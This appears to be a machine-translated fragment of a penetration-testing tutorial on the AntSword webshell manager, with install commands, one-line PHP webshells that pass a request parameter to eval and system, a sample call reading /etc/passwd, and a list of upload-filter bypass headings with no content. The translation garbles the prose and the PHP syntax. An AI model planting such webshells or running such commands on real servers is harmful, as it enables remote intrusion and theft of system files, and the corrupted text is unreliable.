Use Chinese ant sword
China had wanted to use a kitchen knife to demonstrate the use of WebShell, but the Chinese kitchen knife too old and not open source, but also broke a variety of back door, so I have more shaded, here I use the Chinese ant sword, the sword is a Chinese ant open source cross-platform Web site Administration tool, which is mainly oriented to the legally authorized penetration testing security personnel as well as webmasters normal operation, the use of knives and similar and cross-platform.
Ant sword installation need to download two files, and source code is loaded, the following code is hosted on GitHub:
> git clone https://github.com/AntSwordProject/antSword.git > git clone https://github.com/AntSwordProject/AntSword-Loader.git
After downloading the program click on OK AntSword.exe loader then select antSword source code, the program can work properly, then we look at the wording commonly used WebShell pony.
# Eval using PHP system function ; <php eval ($ _ REQUEST [ 'cmd'])??> Invocation: http: //lyshark.com/shell.php cmd = phpinfo ( );?
# System system command <System PHP ($ _ the REQUEST [ 'cmd']);??> Http://lyshark.com/shell.php?cmd=cat / etc / the passwd
2. The client detection bypass
3. The server detects blacklist
4. Detection server whitelist
5.MIME verification bypass
6. Directory Authentication bypass